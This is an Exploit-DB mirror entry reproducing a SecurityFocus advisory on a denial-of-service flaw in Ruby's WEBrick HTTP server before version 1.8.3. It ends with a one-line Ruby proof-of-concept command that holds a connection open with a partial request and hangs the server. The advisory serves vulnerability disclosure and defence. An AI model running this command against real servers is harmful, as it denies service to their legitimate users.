exploit-db-mirror/exploits/linux/dos/27723.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
657 B
Text

source: https://www.securityfocus.com/bid/17645/info
Ruby is affected by a denial-of-service vulnerability in the WEBrick HTTP server. This issue is due to the use of blocking network operations. Ruby's implementation of XML/RPC is also affected, since it uses the vulnerable WEBrick server.
This issue allows remote attackers to cause affected webservers to fail to respond to further legitimate requests.
Ruby versions prior to 1.8.3 are affected by this issue.
The following Ruby command will issue a request sufficient to trigger this issue:
ruby -rsocket -e 'TCPSocket.open("www.example.com", 10080) {|s|
s.print "GET /z HTTP/1.0\r\n\r\n"
sleep
}'